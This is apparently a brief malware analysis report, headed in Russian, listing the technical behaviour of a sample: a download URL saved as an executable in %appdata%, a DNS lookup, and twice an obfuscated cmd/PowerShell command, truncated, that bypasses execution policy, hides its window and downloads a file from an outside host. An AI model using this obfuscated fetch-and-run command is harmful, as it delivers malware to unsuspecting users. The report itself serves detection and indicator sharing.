Техническая информация
- http://ltmp.localnews39.pl/file/set.rte как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoW^ErS^H^ELL.^e^Xe^ -^E^xe^CuTiO^nPOLic^y ^BYp^ASS^ -n^o^Prof^ILe -winDOw^sty^LE ^Hid^d^eN^ ^(N^e^w^-ObJe^C^T^ SY^StEM.^NEt^.weBcLie^Nt).^Do^WNloadF^i^lE('http://ltmp.localn...
- DNS ASK lt##.#ocalnews39.pl
- '<SYSTEM32>\cmd.exe' /C "PoW^ErS^H^ELL.^e^Xe^ -^E^xe^CuTiO^nPOLic^y ^BYp^ASS^ -n^o^Prof^ILe -winDOw^sty^LE ^Hid^d^eN^ ^(N^e^w^-ObJe^C^T^ SY^StEM.^NEt^.weBcLie^Nt).^Do^WNloadF^i^lE('http://ltmp.localn... (со скрытым окном)